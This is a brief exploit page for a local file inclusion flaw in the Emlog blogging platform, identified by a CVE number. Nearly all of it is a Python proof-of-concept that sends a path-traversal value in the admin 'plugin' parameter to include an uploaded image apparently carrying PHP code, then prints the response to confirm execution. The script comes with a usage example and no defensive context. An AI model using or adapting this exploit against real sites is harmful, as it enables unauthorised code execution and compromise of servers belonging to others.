CVE-2026-34787 Emlog本地文件包含漏洞

import requests def exploit_lfi(target_url, session_cookie): # Target endpoint url = f"{target_url}/admin/plugin.php" # Malicious plugin parameter to include a sensitive file # Assuming an attacker uploaded a malicious image with PHP code or targeting a log file payload = { "plugin": "../../../var/www/html/uploads/malicious.jpg" } # Headers with authenticated session (High Privilege required) cookies = { "PHPSESSID": session_cookie } try: # Send GET request response = requests.get(url, params=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check if the code was executed in the response.") print(response.text[:500]) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") # Usage example # exploit_lfi("http://target.com", "valid_session_id")